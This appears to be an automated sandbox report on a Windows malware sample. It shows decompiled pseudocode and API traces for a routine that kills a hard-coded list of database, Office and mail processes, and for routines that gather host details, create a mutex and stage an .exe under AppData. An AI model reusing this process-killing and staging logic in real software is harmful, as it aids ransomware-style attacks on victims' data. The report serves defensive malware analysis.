0x0f582b28
0x0f582b2c
0x0f582b38
0x0f582b3e
0x0f582b43
0x0f582b48
0x0f582b4a
0x0f582b55
0x0f582b62
0x0f582b67
0x0f582b6c
0x0f582b75
0x0f582b89
0x0f582b8e
0x0f582b9c
0x0f582ba2
0x0f582ba5
0x0f582ba7
0x0f582bac
0x0f582bae
0x0f582be4
0x0f582bec
0x0f582bf4
0x0f582bf6
0x0f582bfd
0x0f582c02
0x0f582c05
0x0f582c07
0x00000000
0x00000000
0x0f582c0f
0x0f582c11
0x0f582c16
0x0f582c1d
0x0f582c2c
0x0f582c2c
0x0f582c2c
0x0f582c2e
0x0f582c2e
0x0f582c2f
0x0f582c35
0x0f582c3b
0x00000000
0x0f582c3d
0x0f582c25
0x0f582c2a
0x00000000
0x00000000
0x00000000
0x0f582c2a
0x0f582bb6
0x0f582bb8
0x0f582bbd
0x0f582bc4
0x0f582bd3
0x0f582bd3
0x0f582bd3
0x0f582bd5
0x0f582bd5
0x00000000
0x0f582bd5
0x0f582bcc
0x0f582bd1
0x00000000
0x00000000
0x00000000
0x0f582b4c
0x0f582b4c
0x0f582c40
0x0f582c40
0x0f582c45
0x0f582c47
0x0f582c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F582AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F582B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 0F582B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 0F582B7D

Part of subcall function 0F5882B0: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F5882CD
Part of subcall function 0F5882B0: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F5882FB
Part of subcall function 0F5882B0: GetModuleHandleA.KERNEL32(?), ref: 0F58834F
Part of subcall function 0F5882B0: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F58835D
Part of subcall function 0F5882B0: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F58836C
Part of subcall function 0F5882B0: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5883B5
Part of subcall function 0F5882B0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5883C3

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 0F582B9C
lstrcatW.KERNEL32 ref: 0F582BE4
lstrcatW.KERNEL32 ref: 0F582BEC
lstrcatW.KERNEL32 ref: 0F582BF4
wsprintfW.USER32 ref: 0F582C35
ExitThread.KERNEL32 ref: 0F582C47

Strings

AppData, xrefs: 0F582B97
I, xrefs: 0F582B6C
\Microsoft\, xrefs: 0F582BDE
.exe, xrefs: 0F582BEE
"%s", xrefs: 0F582C2F
U, xrefs: 0F582B75
P, xrefs: 0F582B55

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
Instruction ID: 771572041b1eb57703340caded6851e0109114bff87869e903ba5e3081b329f2
Opcode Fuzzy Hash: e9623cf4644d256d14c7d69c3759b4073a8067a4a73cdf18faeb4b36fda37c82
Instruction Fuzzy Hash: 5E419F71204311ABE304EF20DD49BAB7FD9BB88715F044439B545B6282DBBC990BCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 0F5848C0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 114
processmemorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0F5848C0() {
				char* _v12;
				char* _v16;
				char* _v20;
				char* _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				char* _v40;
				char* _v44;
				char* _v48;
				char* _v52;
				char* _v56;
				char* _v60;
				char* _v64;
				char* _v68;
				char* _v72;
				char* _v76;
				char* _v80;
				char* _v84;
				char* _v88;
				char* _v92;
				char* _v96;
				char* _v100;
				char* _v104;
				char* _v108;
				char* _v112;
				char* _v116;
				char* _v120;
				char* _v124;
				char* _v128;
				char* _v132;
				char* _v136;
				char* _v140;
				char* _v144;
				char* _v148;
				char* _v152;
				char* _v156;
				char* _v160;
				char* _v164;
				void* _v172;
				void* _t49;
				void* _t50;
				int _t51;
				int _t52;
				int _t53;
				void* _t60;
				WCHAR* _t62;
				void* _t65;
				void* _t70;
				signed int _t71;
				void* _t72;
				signed int _t74;
				void* _t76;

				_t76 = (_t74 & 0xfffffff8) - 0xa4;
				_v164 = L"msftesql.exe";
				_v160 = L"sqlagent.exe";
				_v156 = L"sqlbrowser.exe";
				_v152 = L"sqlservr.exe";
				_v148 = L"sqlwriter.exe";
				_v144 = L"oracle.exe";
				_v140 = L"ocssd.exe";
				_v136 = L"dbsnmp.exe";
				_v132 = L"synctime.exe";
				_v128 = L"mydesktopqos.exe";
				_v124 = L"agntsvc.exeisqlplussvc.exe";
				_v120 = L"xfssvccon.exe";
				_v116 = L"mydesktopservice.exe";
				_v112 = L"ocautoupds.exe";
				_v108 = L"agntsvc.exeagntsvc.exe";
				_v104 = L"agntsvc.exeencsvc.exe";
				_v100 = L"firefoxconfig.exe";
				_v96 = L"tbirdconfig.exe";
				_v92 = L"ocomm.exe";
				_v88 = L"mysqld.exe";
				_v84 = L"mysqld-nt.exe";
				_v80 = L"mysqld-opt.exe";
				_v76 = L"dbeng50.exe";
				_v72 = L"sqbcoreservice.exe";
				_v68 = L"excel.exe";
				_v64 = L"infopath.exe";
				_v60 = L"msaccess.exe";
				_v56 = L"mspub.exe";
				_v52 = L"onenote.exe";
				_v48 = L"outlook.exe";
				_v44 = L"powerpnt.exe";
				_v40 = L"steam.exe";
				_v36 = L"sqlservr.exe";
				_v32 = L"thebat.exe";
				_v28 = L"thebat64.exe";
				_v24 = L"thunderbird.exe";
				_v20 = L"visio.exe";
				_v16 = L"winword.exe";
				_v12 = L"wordpad.exe";
				_t49 = CreateToolhelp32Snapshot(2, 0); // executed
				_t70 = _t49;
				_v172 = _t70;
				_t50 = VirtualAlloc(0, 0x22c, 0x3000, 4); // executed
				_t60 = _t50;
				if(_t60 != 0) {
					 *_t60 = 0x22c;
					if(_t70 != 0xffffffff) {
						_push(_t60);
						Process32FirstW(_t70); // executed
					}
				}
				_t41 = _t60 + 0x24; // 0x24
				_t62 = _t41;
				do {
					_t71 = 0;
					do {
						_t51 = lstrcmpiW( *(_t76 + 0x14 + _t71 * 4), _t62);
						if(_t51 == 0) {
							_t65 = OpenProcess(1, _t51,  *(_t60 + 8));
							if(_t65 != 0) {
								TerminateProcess(_t65, 0);
								CloseHandle(_t65);
							}
						}
						_t71 = _t71 + 1;
						_t46 = _t60 + 0x24; // 0x24
						_t62 = _t46;
					} while (_t71 < 0x27);
					_t72 = _v172;
					_t52 = Process32NextW(_t72, _t60);
					_t48 = _t60 + 0x24; // 0x24
					_t62 = _t48;
				} while (_t52 != 0);
				if(_t60 != 0) {
					VirtualFree(_t60, 0, 0x8000); // executed
				}
				_t53 = FindCloseChangeNotification(_t72); // executed
				return _t53;
			}

0x0f5848c6
0x0f5848d3
0x0f5848db
0x0f5848e3
0x0f5848eb
0x0f5848f3
0x0f5848fb
0x0f584903
0x0f58490b
0x0f584913
0x0f58491b
0x0f584923
0x0f58492b
0x0f584933
0x0f58493b
0x0f584943
0x0f58494b
0x0f584953
0x0f58495b
0x0f584963
0x0f58496b
0x0f584973
0x0f58497b
0x0f584983
0x0f58498b
0x0f584993
0x0f58499b
0x0f5849a3
0x0f5849ae
0x0f5849b9
0x0f5849c4
0x0f5849cf
0x0f5849da
0x0f5849e5
0x0f5849f0
0x0f5849fb
0x0f584a06
0x0f584a11
0x0f584a1c
0x0f584a27
0x0f584a32
0x0f584a44
0x0f584a48
0x0f584a4c
0x0f584a52
0x0f584a56
0x0f584a58
0x0f584a61
0x0f584a63
0x0f584a65
0x0f584a65
0x0f584a61
0x0f584a71
0x0f584a71
0x0f584a74
0x0f584a74
0x0f584a80
0x0f584a85
0x0f584a8d
0x0f584a9b
0x0f584a9f
0x0f584aa4
0x0f584ab1
0x0f584ab1
0x0f584a9f
0x0f584abb
0x0f584abc
0x0f584abc
0x0f584abf
0x0f584ac4
0x0f584aca
0x0f584ad0
0x0f584ad0
0x0f584ad3
0x0f584ad9
0x0f584ae3
0x0f584ae3
0x0f584aea
0x0f584af2

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0F584A32
VirtualAlloc.KERNEL32(00000000,0000022C,00003000,00000004), ref: 0F584A4C
Process32FirstW.KERNEL32(00000000,00000000), ref: 0F584A65
lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
CloseHandle.KERNEL32(00000000), ref: 0F584AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F584AEA

Strings

i)w, xrefs: 0F584A85

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CloseProcessProcess32Virtual$AllocChangeCreateFindFirstFreeHandleNextNotificationOpenSnapshotTerminateToolhelp32lstrcmpi
String ID: i)w
API String ID: 3023235786-1280834553
Opcode ID: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
Instruction ID: a5e6a378b55c7ef619c32334364e3d2b63d1585fd9da39f2db305f325d105f33
Opcode Fuzzy Hash: d1d312dff32233aaec35ca917e60c72902ef578caecebe7eb2328325f465553f
Instruction Fuzzy Hash: D5515EB51083419FE320EF51954875BBFE4FBA9718F60492DE594BB252C734880BCF96

Uniqueness

Uniqueness Score: -1.00%

Function 0F5847D0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 83stringmemorysynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0F583BC0: GetProcessHeap.KERNEL32(?,?,0F584807,00000000,?,00000000,00000000), ref: 0F583C5C

Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F5874B7
Part of subcall function 0F587490: GetUserNameW.ADVAPI32 ref: 0F5874C8
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F5874E6
Part of subcall function 0F587490: GetComputerNameW.KERNEL32 ref: 0F5874F0
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F587510
Part of subcall function 0F587490: wsprintfW.USER32 ref: 0F587551
Part of subcall function 0F587490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F58756E
Part of subcall function 0F587490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F587592
Part of subcall function 0F587490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F584810,?), ref: 0F5875B6
Part of subcall function 0F587490: RegCloseKey.KERNEL32(00000000), ref: 0F5875D2

Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872F2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5872FD
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587313
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58731E
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587334
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F58733F
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587355
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(0F584B36,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587360
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587376
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587381
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F587397
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873A2
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873C1
Part of subcall function 0F5872A0: lstrlenW.KERNEL32(?,?,?,?,0F584819,00000000,?,00000000,00000000,?,00000000), ref: 0F5873CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58482C
lstrcpyW.KERNEL32 ref: 0F58484F
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584856
CreateMutexW.KERNEL32(00000000,00000000,00000000,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58486E
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58487A
GetLastError.KERNEL32(?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F584881
VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F58489B

Strings

Global\, xrefs: 0F584849

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: lstrlen$Virtual$Alloc$ErrorLastName$CloseComputerCreateFreeHeapMutexOpenProcessQueryUserValuelstrcpywsprintf
String ID: Global\
API String ID: 3131499543-188423391
Opcode ID: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
Instruction ID: cdf7a54993bd3f3f5c11b4a493e5204001f3a608bd5b5e4e568676fe4fbc45d2
Opcode Fuzzy Hash: 4f5bb87c5ed08e318a808f738d565ff6078c7f6d9d89c352492d9a1fee210d07
Instruction Fuzzy Hash: 23212371650712BBE124B724DC4AF7F7B5CEB80B11F600239BA05B61D1AA98790B8AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0F584A78 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 46
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F584A78(void* __ebx, WCHAR* __ecx, void* __esi, void* __ebp, void* _a12) {
				int _t8;
				int _t9;
				int _t10;
				void* _t15;
				WCHAR* _t17;
				void* _t18;
				signed int _t23;
				void* _t24;
				void* _t28;

				_t17 = __ecx;
				_t15 = __ebx;
				while(1) {
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
					if(_t23 < 0x27) {
						continue;
					}
					L7:
					_t24 = _a12;
					_t9 = Process32NextW(_t24, _t15);
					_t7 = _t15 + 0x24; // 0x24
					_t17 = _t7;
					if(_t9 != 0) {
						_t23 = 0;
						do {
							goto L2;
						} while (_t23 < 0x27);
						goto L7;
					}
					if(_t15 != 0) {
						VirtualFree(_t15, 0, 0x8000); // executed
					}
					_t10 = FindCloseChangeNotification(_t24); // executed
					return _t10;
					L2:
					_t8 = lstrcmpiW( *(_t28 + 0x14 + _t23 * 4), _t17);
					if(_t8 == 0) {
						_t18 = OpenProcess(1, _t8,  *(_t15 + 8));
						if(_t18 != 0) {
							TerminateProcess(_t18, 0);
							CloseHandle(_t18);
						}
					}
					_t23 = _t23 + 1;
					_t5 = _t15 + 0x24; // 0x24
					_t17 = _t5;
				}
			}

0x0f584a78
0x0f584a78
0x0f584a80
0x0f584a80
0x0f584a85
0x0f584a8d
0x0f584a9b
0x0f584a9f
0x0f584aa4
0x0f584ab1
0x0f584ab1
0x0f584a9f
0x0f584abb
0x0f584abc
0x0f584abc
0x0f584ac2
0x00000000
0x00000000
0x0f584ac4
0x0f584ac4
0x0f584aca
0x0f584ad0
0x0f584ad0
0x0f584ad5
0x0f584a74
0x0f584a80
0x00000000
0x00000000
0x00000000
0x0f584a80
0x0f584ad9
0x0f584ae3
0x0f584ae3
0x0f584aea
0x0f584af2
0x0f584a80
0x0f584a85
0x0f584a8d
0x0f584a9b
0x0f584a9f
0x0f584aa4
0x0f584ab1
0x0f584ab1
0x0f584a9f
0x0f584abb
0x0f584abc
0x0f584abc
0x0f584abf

APIs

lstrcmpiW.KERNEL32(00000002,00000024), ref: 0F584A85
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0F584A95
TerminateProcess.KERNEL32(00000000,00000000), ref: 0F584AA4
CloseHandle.KERNEL32(00000000), ref: 0F584AB1
Process32NextW.KERNEL32(?,00000000), ref: 0F584ACA
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F584AE3
FindCloseChangeNotification.KERNEL32(?), ref: 0F584AEA

Strings

i)w, xrefs: 0F584A85

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: CloseProcess$ChangeFindFreeHandleNextNotificationOpenProcess32TerminateVirtuallstrcmpi
String ID: i)w
API String ID: 3573210778-1280834553
Opcode ID: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
Instruction ID: afc5d68616beee0a847f8aa24f2523bddbe59793893879677c402e05be8aec33
Opcode Fuzzy Hash: be91fde881da1e021e417219323cf6ef2830974b8f40194d052ea10f061a5b6e
Instruction Fuzzy Hash: 7301FE32100102FFD710AF50AD85B5A77AEFF84712F314035FE09BA141D734981B9B95

Uniqueness

Uniqueness Score: -1.00%

Function 0F5835C0 Relevance: 13.6, APIs: 9, Instructions: 94
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F5835C0(intOrPtr __ecx, intOrPtr __edx) {
				long _v8;
				long _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t12;
				void* _t14;
				long _t17;
				void* _t18;
				int _t21;
				void* _t25;
				char* _t29;
				void* _t37;
				void* _t39;

				_v16 = __edx;
				_v20 = __ecx;
				_v12 = 0;
				_t12 = VirtualAlloc(0, 0xa00, 0x3000, 4); // executed
				_t39 = _t12;
				if(_t39 != 0) {
					GetModuleFileNameW(0, _t39, 0x100);
					_t14 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0, 0); // executed
					_t37 = _t14;
					if(_t37 != 0xffffffff) {
						_t17 = GetFileSize(_t37, 0);
						_v8 = _t17;
						_t18 = VirtualAlloc(0, _t17, 0x3000, 4); // executed
						_t25 = _t18;
						if(_t25 != 0) {
							_t21 = ReadFile(_t37, _t25, _v8,  &_v24, 0); // executed
							if(_t21 != 0) {
								_t29 = _v8 - 1 + _t25;
								if( *_t29 != 0) {
									do {
										_t29 = _t29 - 1;
									} while ( *_t29 != 0);
									E0F5834F0(_t29 + 1, _v20, _v16);
									_t32 =  !=  ? 1 : 0;
									_v12 =  !=  ? 1 : 0;
								}
							}
							VirtualFree(_t25, 0, 0x8000); // executed
						}
						CloseHandle(_t37);
					}
					VirtualFree(_t39, 0, 0x8000); // executed
					return _v12;
				} else {
					return _t12;
				}
			}

0x0f5835dc
0x0f5835df
0x0f5835e2
0x0f5835e9
0x0f5835eb
0x0f5835ef
0x0f583600
0x0f583616
0x0f58361c
0x0f583621
0x0f583626
0x0f583636
0x0f583639
0x0f58363b
0x0f58363f
0x0f58364c
0x0f583654
0x0f58365a
0x0f58365f
0x0f583661
0x0f583661
0x0f583662
0x0f58366e
0x0f58367f
0x0f583682
0x0f583682
0x0f58365f
0x0f58368d
0x0f58368d
0x0f583694
0x0f583694
0x0f5836a2
0x0f5836b1
0x0f5835f6
0x0f5835f6
0x0f5835f6

APIs

VirtualAlloc.KERNEL32(00000000,00000A00,00003000,00000004,?,77296980), ref: 0F5835E9
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100,772D82B0), ref: 0F583600
CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0F583616
GetFileSize.KERNEL32(00000000,00000000), ref: 0F583626
VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F583639
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 0F58364C
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F58368D
CloseHandle.KERNEL32(00000000), ref: 0F583694
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F5836A2

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FileVirtual$AllocFree$CloseCreateHandleModuleNameReadSize
String ID:
API String ID: 2352497600-0
Opcode ID: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
Instruction ID: e599193e7c4041a2befb8ab07b480e90e0128ce1b3f4c355849a55e32297ea98
Opcode Fuzzy Hash: e211a75ede2c2e1665cc1d3d9220e76e2eb715594cf79eda6072332d57854673
Instruction Fuzzy Hash: 1121F931B403047BFB216BA99D86FAE7B68EB44B21F200069FB05BA3C1D7B895179754

Uniqueness

Uniqueness Score: -1.00%

Function 0F587D70 Relevance: 12.6, APIs: 10, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0F587D70(intOrPtr* __ecx) {
				int _t20;
				intOrPtr* _t24;

				_t24 = __ecx;
				if( *__ecx != 0) {
					_t20 = VirtualFree( *(__ecx + 8), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0xc)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x14), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x18)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x20), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x30)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x38), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x3c)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x44), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x48)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x50), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x54)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x5c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x24)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x2c), 0, 0x8000);
				}
				if( *((intOrPtr*)(_t24 + 0x60)) != 0) {
					_t20 = VirtualFree( *(_t24 + 0x68), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t24 + 0x80)) != 0) {
					return VirtualFree( *(_t24 + 0x84), 0, 0x8000);
				}
				return _t20;
			}

0x0f587d71
0x0f587d7d
0x0f587d89
0x0f587d89
0x0f587d8f
0x0f587d9b
0x0f587d9b
0x0f587da1
0x0f587dad
0x0f587dad
0x0f587db3
0x0f587dbf
0x0f587dbf
0x0f587dc5
0x0f587dd1
0x0f587dd1
0x0f587dd7
0x0f587de3
0x0f587de3
0x0f587de9
0x0f587df5
0x0f587df5
0x0f587dfb
0x0f587e07
0x0f587e07
0x0f587e0d
0x0f587e19
0x0f587e19
0x0f587e22
0x00000000
0x0f587e31
0x0f587e35

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D89
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587D9B
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DAD
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DBF
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DD1
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DE3
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587DF5
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E07
VirtualFree.KERNELBASE(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E19
VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000001,0F5848AA,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F587E31

Memory Dump Source

Source File: 00000003.00000002.298114083.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true

Associated: 00000003.00000002.298101480.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298127638.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298139854.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.298147707.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_f580000_mqsmvj.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
Instruction ID: a4cfbd202773137b3d5cac9fa628adb43f671732b21f4072b2ea178205ee5206
Opcode Fuzzy Hash: 79fd3a0806556af62fcae1552eb4c287db0f83ef659906727aabc9fba245c44a
Instruction Fuzzy Hash: 3321D030240B04AAE6766A15DC06FA6B7E1BB44B05F75493CE2C2344F18BF5749ADF04

Uniqueness

Uniqueness Score: -1.00%

